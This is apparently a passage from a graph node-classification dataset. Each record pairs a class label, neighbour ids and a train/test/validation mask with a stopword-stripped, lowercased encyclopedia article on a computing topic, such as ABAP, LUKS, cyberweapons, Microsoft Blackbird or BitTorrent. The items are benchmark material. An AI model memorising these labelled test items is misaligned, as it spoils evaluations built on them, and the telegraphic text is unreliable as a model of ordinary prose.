chain operator codice_6 common part statements written left colon differing parts written right colon separated commas colon operator attached directly preceding token without space applies commas token list seen examples chaining often used codice_2 statements codice_2 accepts one argument instance wanted display three fields structure called flightinfo would code write flightinfo-cityfrom write flightinfo-cityto write flightinfo-airpto chaining statements results readable intuitive form write flightinfo-cityfrom flightinfo-cityto flightinfo-airpto chain statement first part colon limited statement name alone entire common part consecutive statements placed colon example replace b lastname replace b firstname replace b cityname could rewritten chained form replace b lastname firstname cityname abap 2 ways defining text comment example report bookings select flightinfo code abap whitespace-sensitive x a+b c assigns variable x substring variable starting b length defined variable c. x b c assigns variable x sum variable result call method b parameter c. contrast languages like c/c++ java define limited set language-specific statements provide functionality via libraries abap contains extensive amount built-in statements statements traditionally used sentence-like structures avoided symbols making abap programs relatively verbose however recent versions abap language terser style possible example statement based syntax whose syntax originates cobol versus expression-based syntax c/java add tax price price price tax abap provides set built-in data types addition every structure table view data element defined abap dictionary used type variable also object classes interfaces used types built-in data types date variables constants type contain number days since january 1 1 ad time variables constants type contain number seconds since midnight special characteristic types accessed integers character strings internal format yyyymmdd dates hhmmss times used date time handling example code snippet calculates last day previous month note sy-datum system-defined variable containing current date data last_eom type d. last end-of-month date last_eom sy-datum last_eom+6 2 '01 last_eom last_eom 1 abap variables explicitly declared order used declared either individual statements explicit typing since abap 7.40 inline inferred typing normally declarations placed top code module program subroutine function first executable statement placement convention enforced syntax rule declaration consists name type length applicable additional modifiers e.g number implied decimals packed decimal field optionally initial value data counter type data origin type country data t_flights type table flightinfo data booking type ref cl_flt_booking notice use colon chain together consecutive data statements since abap 7.40 variables declared inline following syntax data variable_name 'value type declaration must possible infer type statically e.g method signature database table structure syntax also possible opensql statements select ekko data lt_ekko ebeln eq lv_ebeln abap language supports object-oriented programming feature known abap objects helps simplify applications make controllable abap objects fully compatible existing language one use existing statements modularization units programs use abap objects also use abap objects existing abap programs syntax checking stronger abap objects programs syntactical forms usually older ones certain statements permitted objects form capsule combines character respective behavior objects enable programmers map real problem proposed software solution one-to-one basis typical objects business environment example ‘ customer ’ ‘ order ’ ‘ invoice ’ release 3.1 onwards business object repository bor sap web application server abap contained examples objects bor object model integrated abap objects next release migrating bor object types abap class library comprehensive introduction object orientation whole would go far beyond limits introduction abap objects documentation introduces selection terms used universally object orientation also occur abap objects subsequent sections goes discuss detail terms used abap objects end section contains list reading selection titles object orientation object-oriented programming objects usually following properties abap core data services abap cds implementation general cds concept abap abap cds makes possible define semantic data models central database application server abap models defined independently database system entities models provide enhanced access functions compared existing database tables views defined abap dictionary making possible optimize open sql-based applications particularly clear abap uses sap hana database since in-memory characteristics implemented optimum manner. br data models defined using data definition language ddl data control language dcl provided abap cds abap cds syntax objects defined using languages integrated abap dictionary managed br cds source code programmed eclipse-based abap development tools adt data definition language ddl data control language dcl use different editors internal tables important feature abap language internal table defined similarly vector struct c++ vector objects java main difference languages abap provides collection statements easily access manipulate contents internal tables note abap support arrays way define multi-element data object use internal table internal tables way store variable data sets fixed structure working memory abap provides functionality dynamic arrays data stored row-by-row basis row structure internal tables preferably used store format content database tables within program furthermore internal tables connection structures important means defining complex data structures abap program following example defines internal table two fields format database table vbrk types begin t_vbrk data gt_vbrk type standard table t_vbrk data gs_vbrk type t_vbrk types tt_vbrk type standard table t_vbrk following list gives rough overview important milestones history language abap details see abap release-specific changes",
    "neighbors": [
      9345,
      6797,
      11030,
      1304,
      5658,
      2168,
      10398,
      2596,
      5677,
      10413,
      7983,
      5684,
      823,
      1343,
      6850,
      963,
      5961,
      4042,
      5210,
      10340,
      10470,
      11625,
      5612,
      9330,
      5492,
      8312,
      4604
    ],
    "mask": "None"
  },
  {
    "node_id": 3415,
    "label": 1,
    "text": "Kaii-Yōkai_Denshō_Database:kaii-yōkai denshō database database yōkai mystery stories collected japanese folklore database published international research center japanese studies prototype created march 19 2002 first live version released june 20 2002. project supervisor kazuhiko komatsu japanese folklorist professor study yōkai database includes verbal information without visual information data collected item database abstract around 100 characters full text searchable database searched name region item found",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 3416,
    "label": 9,
    "text": "Java_Mobile_Media_API:java mobile media api mobile media api mmapi api specification java platform cdc cldc devices mobile phones depending implemented apis allow applications play record sounds video capture still images mmapi developed java community process jsr 135 multimedia java api based around four main types classes codice_1 package—the codice_2 codice_3 codice_4 various types codice_5 java programmers wishing use jsr 135 would first make use static methods codice_2 class although methods codice_7 main method used codice_8 takes either uri mime type cases uris used common uri protocols used include mime type optional inferred data passed supplied codice_8 method returns implementation codice_3 interface even use capture protocol uri core methods applicable players starting stopping media requesting loop also codice_11 object implementing codice_4 interface receive various events related clip starting stopping media finishing etc codice_3 classes also codice_14 method returns implementation particular codice_5 codice_5 handles optional apis applicable media types given codice_3 may may able supply implementation given codice_5 set controls implemented codice_3 limited however standard ones defined codice_22 package jsr others may defined jsr 234 advanced multimedia supplements subset jsr 135 defined jsr 118 midp 2.0 regardless protocol media type involved codice_3 moves discrete states lifecycle states listed table java specifications implementations differ despite best efforts specification authors ensure consistency two obvious areas differences controls supported acceptable uri types first place obscure areas whether mixing supported many games would like play midi music track layer pcm sound effects top another source extreme variance performance example http clip requested point clip get downloaded specification recognises providing two codice_3 methods called advance actually playing codice_25 codice_26 depending implementation may work getting clip playable state thus making quicker actually play clip needed implementations sophisticated enough actually stream clip request whilst played symbian os contains complete implementation jsr 135 even highly dependent underlying multimedia capabilities device device manufacturers may choose expose obscure parts java recording implementation consistency ensured forcing implementations pass java technology compatibility kit tck ensures supported uri schema mime type control tested test every permutation optional parts",
    "neighbors": [
      4960,
      7108,
      9350,
      3561,
      8880,
      690,
      9011,
      2556
    ],
    "mask": "Test"
  },
  {
    "node_id": 3417,
    "label": 4,
    "text": "Brewer_and_Nash_model:brewer nash model brewer nash model constructed provide information security access controls change dynamically security model also known chinese wall model designed provide controls mitigate conflict interest commercial organizations built upon information flow model brewer nash model information flow subjects objects way would create conflict interest",
    "neighbors": [
      3616,
      3440,
      6162,
      1364,
      5373
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3418,
    "label": 9,
    "text": "DG/L:dg/l dg/l programming language developed data general corp nova eclipse eclipse/mv families minicomputers 1970s early 1980s actually two separate versions language extended version algol 60 supported integers single double precision floating point complex numbers fixed arbitrary precision strings also supported full arbitrary precision bcd arithmetic strings large number convenient program flow features designed mid 70s lacked user defined data structures dg/l substantial runtime library day used systems programming within outside data general originally called algol/5 product renamed dg/l shortly first commercial release 1978 officially name meaningless apparently supposed imply data general language first commercial release targeting 16 bit eclipse nova several subsequent updates major versions released approximately one year appendix data general 1982 revision dg/l language reference manual 093-00229-01 describes dg/l based algol 60 programming language gives data types operations statements algol 60 lacks specific differences extensions algol 60 standard introduced dg/l carried data general previous algol implementation 1971",
    "neighbors": [
      96,
      512,
      1610,
      8902
    ],
    "mask": "None"
  },
  {
    "node_id": 3419,
    "label": 4,
    "text": "Trust_boundary:trust boundary trust boundary term computer science security used describe boundary program data execution changes level trust term refers distinct boundary within system trusts sub-systems including data example execution trust boundary would application attains increased privilege level root data trust boundary point data comes untrusted source example user input network socket trust boundary violation refers vulnerability computer software trusts data validated crossing boundary",
    "neighbors": [
      700,
      5636,
      2262,
      7804,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3420,
    "label": 4,
    "text": "FSArchiver:fsarchiver fsarchiver disk cloning utility linux fsarchiver save partitions containing different popular file systems disk image continuation partimage project one authors implements new features partimage lacks fsarchiver strives feature-rich less ux partimage result used software toolsets functionality two widely used features partimage lacks support multi-core compression support commonly used ext4 filesystem windows users fsarchiver includes experimental support ntfs fsarchiver supports modern linux file systems ext4 reiser4 btrfs notable features include modern multi-threaded compression disk image files combined file-based images opposed block-based images similar tools use enhance compression ignoring unused clusters",
    "neighbors": [
      9762,
      1801,
      5612,
      6797,
      7983,
      2193,
      823,
      8254,
      8857,
      1150
    ],
    "mask": "None"
  },
  {
    "node_id": 3421,
    "label": 3,
    "text": "Microarchitecture_simulation:microarchitecture simulation microarchitecture simulation important technique computer architecture research computer science education tool modeling design behavior microprocessor components alu cache memory control unit data path among others simulation allows researchers explore design space well evaluate performance efficiency novel microarchitecture features example several microarchitecture components branch predictors re-order buffer trace cache went numerous simulation cycles become common components contemporary microprocessors today addition simulation also enables educators teach computer organization architecture courses hand-on experiences system-level simulation computer hardware please refer full system simulation microarchitecture simulation classified multiple categories according input types level details specifically input trace collected execution program real microprocessor called trace-driven simulation program called execution-driven simulation trace-driven simulation reads fixed sequence trace records file input trace records usually represent memory references branch outcomes specific machine instructions among others trace-driven simulation known comparatively fast results highly reproducible also requires large storage space hand execution-driven simulation reads program simulates execution machine instructions fly program file typically several magnitudes smaller trace file however execution-driven simulation much slower trace-driven simulation process instruction one-by-one update statuses microarchitecture components involved thus selection input types simulation trade-off space time particular detailed trace highly accurate simulation requires large storage space whereas accurate execution-driven simulation takes long time execute instructions program apart input types level details also used classify simulation particular piece software simulates microprocessor executing program cycle-by-cycle basis known cycle-accurate simulator whereas instruction set simulator models execution program microprocessor eyes instruction scheduler along coarse timing instruction execution computer science classes computer architecture hand-on experiences adopt instruction set simulators tools teaching whereas cycle-accurate simulators deployed mostly research projects due complexities resource consumption microarchitecture simulators deployed variety purposes allows researchers evaluate ideas without need fabricate real microprocessor chip expensive time consuming instance simulating microprocessor thousand cores along multiple levels cache memory incurs little cost comparing fabrication prototyping chip researchers also play several configurations cache hierarchy using different cache models simulator instead fabricate new chip every time want test something different another usage microarchitecture simulator education given course computer architecture teaches students many different microprocessor features architectures microarchitecture simulator ideal modeling experimenting different features architectures course semester example students may start microarchitecture simulator models simple microprocessor design beginning semester semester progresses additional features instruction pipelining register renaming reservation stations out-of-order execution scoreboarding modeled added simulator introduced classroom microarchitecture simulator provides flexibility reconfiguration testing minimal costs",
    "neighbors": [
      2241,
      2435,
      7653,
      8231,
      9932,
      3470,
      398,
      6926,
      4465,
      7598,
      7954,
      10734,
      8501,
      10746
    ],
    "mask": "Test"
  },
  {
    "node_id": 3422,
    "label": 6,
    "text": "Linux_Unified_Key_Setup:linux unified key setup linux unified key setup luks disk encryption specification created clemens fruhwirth 2004 originally intended linux disk encryption software implements different incompatible undocumented formats luks implements platform-independent standard on-disk format use various tools facilitates compatibility interoperability among different programs also assures implement password management secure documented manner reference implementation luks operates linux based enhanced version cryptsetup using dm-crypt disk encryption backend microsoft windows luks-encrypted disks used defunct librecrypt formerly doxbox luks designed conform tks1 secure key setup scheme",
    "neighbors": [
      2050,
      7938,
      7812,
      8326,
      10631,
      4360,
      4746,
      8331,
      4493,
      2195,
      3859,
      1813,
      11155,
      9882,
      10780,
      1694,
      3618,
      8106,
      4011,
      9646,
      3382,
      823,
      7354,
      9660,
      8640,
      9281,
      10817,
      8772,
      5067,
      8147,
      8283,
      3422,
      1761,
      7139,
      4841,
      7794,
      3572,
      5749
    ],
    "mask": "Test"
  },
  {
    "node_id": 3423,
    "label": 4,
    "text": "Cyberweapon:cyberweapon cyberweapon malware agent employed military paramilitary intelligence objectives requirements term vary widely common criteria seem malware agent part distinction malware agent sponsored —that commissioned developed and/or actually used—not black-hat hacker organized criminal group instead state non-state actor latter potentially including terrorist groups entities proposed fourth-generation warfare 4gw doctrines cyberweapon performs action would normally require soldier spy would considered either illegal act war performed directly human agent sponsor peacetime legal issues include violating privacy target sovereignty host nation actions include limited cyberweapon almost certainly results either direct indirect financial damages target group direct financial gains sponsor transfer funds primary objective class agent unlike malware used script kiddies organize botnets ownership physical location normal role machines attacked largely irrelevant cyberweapons show high selectivity either employment operation attack cyberweapons usually identify target using different methods likewise malware employed fraudsters theft personal financial information demonstrates lower selectivity wider distribution note self-replication requirement cyberweapons viruses viruses necessarily cyberweapons without capability however alternate vector required get agent onto target system likewise compromised access alone provided rootkit diagnostic employment cyberweapon term frequently used press articles avoid instead using terms like internet weapon virus mainstream researchers debate requirements term still referring employment agent weapon software development community particular uses term rarely following malware agents generally meet criteria formally referred manner industry security experts described way government military statements 2017 data breaches showed supposedly secure hacking tools used government agencies obtained − sometimes exposed − third parties furthermore reported losing control tools government appears leave exploits open re-used scammers criminals anyone else − purpose claudio guarnieri technologist amnesty international states learn disclosures leaks last months unknown vulnerabilities maintained secret even 've clearly lost plain irresponsible unacceptable also year wikileaks released vault 7 documents series contain details cia exploits tools julian assange stating working disarm publication disarmament cyber weapons may come form contacting respective software vendors information vulnerabilities products well potential help autonomous development open source software patches",
    "neighbors": [
      9375,
      1251,
      3843,
      2661,
      5764,
      7739,
      3944,
      297,
      4813,
      9791,
      3473,
      4883,
      3092,
      9460,
      9688,
      3225,
      7515,
      3807
    ],
    "mask": "Test"
  },
  {
    "node_id": 3424,
    "label": 2,
    "text": "Alastair_Sweeny:alastair sweeny alastair sweeny born august 15 1946 canadian publisher historian author born toronto ontario attended st. andrew college received bachelor degree trinity college university toronto master letters doctor philosophy trinity college dublin sweeny managed research programs produced reference learning materials consulted many private public sector organizations including adviser canadian government task force national unity pepin-robarts commission library archives canada parks canada federation saskatchewan indian nations national indian veterans association assembly first nations canadian heritage elibrary proquest nelson thomson learning quebecor media electric library canada canwest global 1989 produced canadisk canada first multimedia cd-rom joint venture encyclopædia britannica 1990s developed learning materials apple computer eworld online service produced original encarta book quotations 1999 microsoft inc. bloomsbury publishing london 1990s helped get canada schoolnet way developed day canadian history online service bell globemedia sweeny produced written corporate history number canadian companies including investors group alberta energy company encana magna international gendis inc.. done background research canadian authors w. l. morton research biography lord strathcona peter c. newman hudson bay company series background history richard gwyn 49th paradox canada north america pierre berton promised land jeffrey simpson spoils power author several books including biography sir george-étienne cartier 1976 canquiz 2002 business biography blackberry blackberry planet published john wiley canada ltd september 2009 book canada oilsands industry black bonanza published wiley april 2010 book fire along frontier great battles war 1812 published dundurn press mark bicentennial war 1812 sweeny currently executive director non-profit educational foundation civics channel dedicated research teaching learning areas citizenship society politics human rights justice system co-author producer civics canada online well print version civics canada 2005 sponsored canadawiki portal also vice president northern blue publishing waterloo ontario co-author producer history canada online canada digital history canada first people history canada native aboriginal nations",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 3425,
    "label": 2,
    "text": "Blackbird_(online_platform):blackbird online platform blackbird codename online content authoring platform developed microsoft mid-90s intended online publishing tool first version msn microsoft network blackbird born microsoft acquisition daily planet software tool first conceived prior advent internet web know today time aol compuserve primary online venues introduction web mass consumers begin even low-bandwidth dialup connections dominated blackbird based concept object-based backend file system microsoft data centers microsoft cairo /nt low-bandwidth-streaming rendering client page-based layout similar aldus pagemaker based online streaming embedded interactive client-side activex objects ole fundamentally based sgml standard direct ancestor html client-side layout unfortunately became microsoft-promoted alternative html brief time commercial internet web browser born scripting capability html yet demonstrated means serve dynamic media-rich applications documents contained processing logic similar user would experience desktop environment pages blackbird application would able contain video audio graphs ole based document formats without need plug-ins technology already demonstrated microsoft dial-up service time msn plans progress port internet use dedicated protocol work platform cancelled due overwhelming move html/www/internet standards commercialized consuming computing world example netscape time need backend server-side scripting technologies lacking performance problems also plagued pre-releases beta testing 1995 microsoft hence refocused efforts online development around web/html standards including asp activex blackbird designer refashioned visual interdev technology integrated first version visual studio vs 97 web-standards based core trademarked microsoft visual studio ancestor one leading web development tools dating commercial birth web today prior name codename derived cold war era stealth spy plane lockheed sr-71 blackbird centerpiece blackbird ole container format already use windows applications allow objects documents communicate share information blackbird documents would stored called blackbird data format bdf structured format based ole storage sgml-based markup language blackbird markup language bml also created help automate creation documents though documents based markup would processed native data format used ole objects would suffer performance disadvantages give developers flexibility microsoft planned include utility would allow conversion bdf bml well html direction additionally would application resource installer packaged custom fonts ole controls resource files blackbird application package would download user activated application first time otherwise update package already user system microsoft also advertised blackbird would take advantage features within windows 95 like shortcuts would allow user automatically schedule delivery content three components platform — authoring system called blackbird designer visual drag-and drop environment similar included visual basic blackbird server ran windows nt blackbird client runtime module lets users access run blackbird applications urls blackbird applications ole monikers microsoft argued blackbird development would cross-platform since ole support already existed macintosh work progress porting unix systems guarantee security company planned act certifying authority ole controls ocxs encourage third parties certifying authorities blackbird announced march 1995 part upcoming microsoft network august clear microsoft intended run widely internet protocols technology later demonstrated msn microsoft released beta version developer tools end 1996 plans new version announced designer renamed visual studio disclosed would use proprietary blackbird file formats rather standard html soon became clear original project effectively scrapped designer later became visual interdev general web content creation tool creating html developing server pages using asp key web technology glue first version visual studio visual studio 97 visual interdev key web ingredient visual studio internet advent microsoft web development tools binding previously mass-successful products visual basic visual c++ internet also included ability author activex controls — ole controls could embedded html pages plug-in would key parts microsoft active platform strategy later revealed blackbird severe performance problems over-complex architecture made excessive use multi-threading prototypes trident html layout engine completed shown goals complex layout blackbird could achieved html better performance led executives rethink project mark anders former head iis team microsoft cited blackbird example microsoft tendency over-complicate software compared projects like longhorn blackbird later referenced united states anti-trust suit microsoft argued prosecution netscape efforts transform web suite internet os seen competition plans proprietary internet led adopt aggressive internet strategy netscape many documents cited prosecution described competition windows however pointed netscape planned compete possible internet platform microsoft windows os",
    "neighbors": [
      488,
      10026,
      4331,
      1581,
      7822,
      847,
      10029,
      119
    ],
    "mask": "None"
  },
  {
    "node_id": 3426,
    "label": 2,
    "text": "TurboDOS:turbodos turbodos multi user cp/m like operating system z80 8086 cpus developed software 2000 inc released around 1982 s100 bus based systems northstar horizon commercial systems line multiprocessor systems including csi-50 csi-75 sci-100 csi-150 multiprocessor nature turbodos unusual feature unlike operating systems time networking processors either afterthought support file transfer protocol turbodos designed ground multiprocessor operating system modular construction operating system generation based relocating linking loader program makes incorporation different hardware driver modules quite easy particularly bus-oriented machines ieee-696 s-100 bus commonly used turbodos systems turbodos highly modular consisting forty separate functional modules distributed relocatable form modules building blocks combine various ways produce family compatible operating systems section describes modules detail describes combine various configurations possible turbodos configurations include numerous subtle variations possible categories architecture turbodos viewed three-level hierarchy highest level hierarchy process level turbodos support many concurrent processes level intermediate level hierarchy kernel level kernel supports 93 c-functions t-functions controls sharing computer resources processor time memory peripheral devices disk files processes make requests kernel entrypoint module osntry decodes c-function t-function number invokes appropriate kernel module c functions include cp/m bdos functions selected mp/m functions lowest level hierarchy driver level contains device-dependent drivers necessary interface turbodos particular hardware used drivers must provided peripherals including console printers disks communications channels network interface drivers also required real-time clock periodic interrupt source bank-switched memory applicable turbodos designed interface almost kind peripheral hardware operates efficiently interrupt-driven dma-type interfaces also work fine using polled programmed-i/o devices turbodos loader osload.com program containing abbreviated version kernel drivers purpose load full turbodos operating system disk file osserver.sys memory system cold-start functional modules distributed relocatable format .rel gen command specialized linker builds executable version system turbodos resident commands commands executable files standard commands",
    "neighbors": [
      2179,
      10499,
      10883,
      394,
      3978,
      1804,
      6797,
      273,
      6289,
      6675,
      7057,
      7187,
      9366,
      11539,
      6296,
      25,
      10776,
      11667,
      8092,
      4637,
      7325,
      9887,
      10016,
      9762,
      421,
      5158,
      10235,
      2345,
      7983,
      3248,
      7217,
      11184,
      6837,
      823,
      9784,
      4409,
      10809,
      6075,
      7483,
      6078,
      2811,
      576,
      9151,
      11075,
      8388,
      4423,
      8136,
      9932,
      5840,
      5457,
      11601,
      1750,
      7382,
      8410,
      7771,
      10333,
      10590,
      97,
      1253,
      8551,
      8298,
      6128,
      5363,
      5492,
      5619,
      7285,
      9335,
      2168,
      1147,
      3197,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 3427,
    "label": 1,
    "text": "Tokyo_Cabinet_and_Kyoto_Cabinet:tokyo cabinet kyoto cabinet tokyo cabinet kyoto cabinet two libraries routines managing key-value databases tokyo cabinet sponsored japanese social networking site mixi multithreaded embedded database manager announced authors modern implementation dbm kyoto cabinet designated successor tokyo cabinet tokyo cabinet features on-disk b+ trees hash tables key-value storage support transactions",
    "neighbors": [
      10921,
      5546,
      10413,
      2804,
      10292,
      4598,
      2966,
      5560,
      1594
    ],
    "mask": "Test"
  },
  {
    "node_id": 3428,
    "label": 5,
    "text": "BitTorrent:bittorrent bittorrent abbreviated bt communication protocol peer-to-peer file sharing p2p used distribute data electronic files internet bittorrent one common protocols transferring large files digital video files containing tv shows video clips digital audio files containing songs peer-to-peer networks estimated collectively account approximately 43 70 internet traffic depending location february 2013 bittorrent responsible 3.35 worldwide bandwidth half 6 total bandwidth dedicated file sharing send receive files person uses bittorrent client internet-connected computer bittorrent client computer program implements bittorrent protocol popular clients include μtorrent xunlei transmission qbittorrent vuze deluge bitcomet tixati bittorrent trackers provide list files available transfer allow client find peer users known seeds may transfer files programmer bram cohen former university buffalo student designed protocol april 2001 released first available version 2 july 2001 recent version 2013 bittorrent clients available variety computing platforms operating systems including official client released bittorrent inc. bittorrent 15–27 million concurrent users time bittorrent utilized 150 million active users based figure total number monthly bittorrent users may estimated quarter billion bittorrent protocol used reduce server network impact distributing large files rather downloading file single source server bittorrent protocol allows users join swarm hosts upload to/download simultaneously protocol alternative older single source multiple mirror sources technique distributing data work effectively networks lower bandwidth using bittorrent protocol several basic computers home computers replace large servers efficiently distributing files many recipients lower bandwidth usage also helps prevent large spikes internet traffic given area keeping internet speeds higher users general regardless whether use bittorrent protocol first release bittorrent client search engine peer exchange users wanted upload file create small torrent descriptor file would upload torrent index site first uploader acted seed downloaders would initially connect peers see diagram right wish download file would download torrent client would use connect tracker list ip addresses seeds peers swarm peer completed download complete file could turn function seed file distributed divided segments called pieces peer receives new piece file becomes source piece peers relieving original seed send piece every computer user wishing copy bittorrent task distributing file shared want entirely possible seed send single copy file eventually distribute unlimited number peers piece protected cryptographic hash contained torrent descriptor ensures modification piece reliably detected thus prevents accidental malicious modifications pieces received nodes node starts authentic copy torrent descriptor verify authenticity entire file receives pieces typically downloaded non-sequentially rearranged correct order bittorrent client monitors pieces needs pieces upload peers pieces size throughout single download example 10 mb file may transmitted ten 1 mb pieces forty 256 kb pieces due nature approach download file halted time resumed later date without loss previously downloaded information turn makes bittorrent particularly useful transfer larger files also enables client seek readily available pieces download immediately rather halting download waiting next possibly unavailable piece line typically reduces overall time download eventual transition peers seeders determines overall health file determined number times file available complete form distributed nature bittorrent lead flood-like spreading file throughout many peer computer nodes peers join swarm likelihood successful download particular node increases relative traditional internet distribution schemes permits significant reduction original distributor hardware bandwidth resource costs distributed downloading protocols general provide redundancy system problems reduce dependence original distributor provide sources file generally transient therefore single point failure one way server-client transfers bittorrent client capable preparing requesting transmitting type computer file network using protocol 2005 way share files creating small text file called torrent files contain metadata files shared trackers keep track seeds peers users want download file first obtain torrent file connect tracker seeds 2005 first vuze bittorrent client introduced distributed tracking using distributed hash tables allowed clients exchange data swarms directly without need torrent file 2006 peer exchange functionality added allowing clients add peers based data found connected nodes though ultimately transfer files network bittorrent download differs one way server-client download typical http ftp request example several fundamental ways taken together differences allow bittorrent achieve much lower cost content provider much higher redundancy much greater resistance abuse flash crowds regular server software however protection theoretically comes cost downloads take time rise full speed may take time enough peer connections established may take time node receive sufficient data become effective uploader contrasts regular downloads http server example vulnerable overload abuse rise full speed quickly maintain speed throughout beginning bittorrent non-contiguous download methods made harder support streaming playback however recently clients offering streaming options bittorrent protocol provides way index torrent files result comparatively small number websites hosted large majority torrents many linking copyrighted works without authorization copyright holders rendering sites especially vulnerable lawsuits bittorrent index list .torrent files typically includes descriptions information torrent content several types websites support discovery distribution data bittorrent network public torrent-hosting sites pirate bay allow users search download collection torrent files users typically also upload torrent files content wish distribute often sites also run bittorrent trackers hosted torrent files two functions mutually dependent torrent file could hosted one site tracked another unrelated site private host/tracker sites operate like public ones except may restrict access registered users may also keep track amount data user uploads downloads attempt reduce leeching web search engines allow discovery torrent files hosted tracked sites examples include pirate bay torrentz isohunt btdigg sites allow user ask content meeting specific criteria containing given word phrase retrieve list links torrent files matching criteria list often sorted respect several criteria relevance seeders-leechers ratio one popular useful due way protocol behaves download bandwidth achievable sensitive value metasearch engines allow one search several bittorrent indices search engines dht search engines monitors dht network indexes torrents via metadata exchange peers tribler bittorrent client among first incorporate built-in search capabilities tribler users find .torrent files held random peers taste buddies adds ability bittorrent protocol using gossip protocol somewhat similar exeem network shut 2005 software includes ability recommend content well dozen downloads tribler software roughly estimate download taste user recommend additional content may 2007 researchers cornell university published paper proposing new approach searching peer-to-peer network inexact strings could replace functionality central indexing site year later team implemented system plugin vuze called cubit published follow-up paper reporting success somewhat similar facility slightly different approach provided bitcomet client torrent exchange feature whenever two peers using bitcomet torrent exchange enabled connect exchange lists torrents name info-hash torrent share storage torrent files previously downloaded user chose enable sharing torrent exchange thus client builds list torrents shared peers connected current session even maintain list sessions instructed time user search torrent collection list certain torrent sort list categories user chooses download torrent list .torrent file automatically searched info-hash value dht network found downloaded querying client create initiate downloading task users find torrent interest torrent index site using search engine built client download open bittorrent client client connects tracker seeds specified torrent file receives list seeds peers currently transferring pieces file client connects peers obtain various pieces swarm contains initial seeder client connects directly begins request pieces clients incorporate mechanisms optimize download upload rates effectiveness data exchange depends largely policies clients use determine send data clients may prefer send data peers send data back tit tat exchange scheme encourages fair trading strict policies often result suboptimal situations newly joined peers unable receive data n't pieces yet trade two peers good connection exchange data simply neither takes initiative counter effects official bittorrent client program uses mechanism called optimistic unchoking whereby client reserves portion available bandwidth sending pieces random peers necessarily known good partners called preferred peers hopes discovering even better partners ensure newcomers get chance join swarm although swarming scales well tolerate flash crowds popular content less useful unpopular niche market content peers arriving initial rush might find content unavailable need wait arrival seed order complete downloads seed arrival turn may take long happen termed seeder promotion problem since maintaining seeds unpopular content entails high bandwidth administrative costs runs counter goals publishers value bittorrent cheap alternative client-server approach occurs huge scale measurements shown 38 new torrents become unavailable within first month strategy adopted many publishers significantly increases availability unpopular content consists bundling multiple files single swarm sophisticated solutions also proposed generally use cross-torrent mechanisms multiple torrents cooperate better share content peer distributing data file treats file number identically sized pieces usually byte sizes power 2 typically 32 kb 16 mb peer creates hash piece using sha-1 hash function records torrent file pieces sizes greater 512 kb reduce size torrent file large payload claimed reduce efficiency protocol another peer later receives particular piece hash piece compared recorded hash test piece error-free peers provide complete file called seeders peer providing initial copy called initial seeder exact information contained torrent file depends version bittorrent protocol convention name torrent file suffix codice_1 torrent files announce section specifies url tracker info section containing suggested names files lengths piece length used sha-1 hash code piece used clients verify integrity data receive though sha-1 shown signs cryptographic weakness bram cohen initially consider risk big enough backward incompatible change example sha-3 bittorrent preparing move sha-256 early days torrent files typically published torrent index websites registered least one tracker tracker maintained lists clients currently connected swarm alternatively trackerless system decentralized tracking every peer acts tracker azureus first bittorrent client implement system distributed hash table dht method alternative incompatible dht system known mainline dht released mainline bittorrent client three weeks later though development since 2002 subsequently adopted µtorrent transmission rtorrent ktorrent bitcomet deluge clients dht adopted private flag – analogous broadcast flag – unofficially introduced telling clients restrict use decentralized tracking regardless user desires flag intentionally placed info section torrent disabled removed without changing identity torrent purpose flag prevent torrents shared clients access tracker flag requested inclusion official specification august 2008 accepted yet clients ignored private flag banned many trackers discouraging practice bittorrent offer users anonymity one usually see ip addresses peers swarm one client firewall program may expose users insecure systems attacks countries copyright organizations scrape lists peers send takedown notices internet service provider users participating swarms files copyright jurisdictions copyright holders may launch lawsuits uploaders downloaders infringement police may arrest suspects cases various means used promote anonymity example bittorrent client tribler makes available tor-like onion network optionally routing transfers peers obscure client requested data exit node would visible peers swarm tribler organization provides exit nodes one advantage tribler clearnet torrents downloaded small decrease download speed one hop routing i2p provides similar anonymity layer although case one download torrents uploaded i2p network bittorrent client vuze allows users concerned anonymity take clearnet torrents make available i2p network bittorrent clients designed provide anonymity used tor debate whether torrenting tor acts drag network private torrent trackers usually invitation require members participate uploading downside single centralized point failure oink pink palace what.cd examples private trackers shut seedbox services download torrent files first company servers allowing user direct download file one ip address would visible seedbox provider third parties virtual private networks encrypt transfers substitute different ip address user anyone monitoring torrent swarm see address growing number individuals organizations using bittorrent distribute licensed works e.g indie bands distributing digital files new songs independent adopters report without using bittorrent technology dramatically reduced demands private networking hardware bandwidth could afford distribute files uses bittorrent file sharing may violate laws jurisdictions see legal issues section bittorrent 100 million users greater share network bandwidth netflix hulu combined early 2015 estimates bittorrent represents 20 broadband traffic routers use network address translation nat must maintain tables source destination ip addresses ports typical home routers limited 2000 table entries expensive routers larger table capacities bittorrent frequently contacts 20–30 servers per second rapidly filling nat tables known cause home routers ceasing work correctly bittorrent protocol still development may therefore still acquire new features enhancements improved efficiency 2 may 2005 azureus 2.3.0.0 known vuze released introducing support trackerless torrents system called distributed database system distributed hash table implementation allows client use torrents working bittorrent tracker following month bittorrent inc. released version 4.2.0 mainline bittorrent client supported alternative dht implementation popularly known mainline dht outlined draft website incompatible azureus recent measurement shows users mainline dht 10 million 25 million daily churn least 10 million mainline dht arguably largest realistic dht world current versions official bittorrent client µtorrent bitcomet transmission bitspirit share compatibility mainline dht dht implementations based kademlia version 3.0.5.0 azureus also supports mainline dht addition distributed database use optional application plugin potentially allows azureus/vuze client reach bigger swarm another idea surfaced vuze virtual torrents idea based distributed tracker approach used describe web resource currently used instant messaging implemented using special messaging protocol requires appropriate plugin anatomic p2p another approach uses decentralized network nodes route traffic dynamic trackers bittorrent clients also use peer exchange pex gather peers addition trackers dht peer exchange checks known peers see know peers 3.0.5.0 release vuze major bittorrent clients compatible peer exchange web seeding implemented 2006 ability bittorrent clients download torrent pieces http source addition swarm advantage feature website may distribute torrent particular file batch files make files available download web server simplify long-term seeding load balancing use existing cheap web hosting setups theory would make using bittorrent almost easy web publisher creating direct http download addition would allow web seed disabled swarm becomes popular still allowing file readily available feature two distinct specifications supported libtorrent 26+ clients use first created john theshad0w hoffman created bittornado first specification requires running web service serves content info-hash piece number rather filename specification created getright authors rely basic http download space using byte serving september 2010 new service named burnbit launched generates torrent url using webseeding server-side solutions provide initial seeding file webserver via standard bittorrent protocol number external seeders reach limit stop serving file original source technique called broadcatching combines rss feeds bittorrent protocol create content delivery system simplifying automating content distribution steve 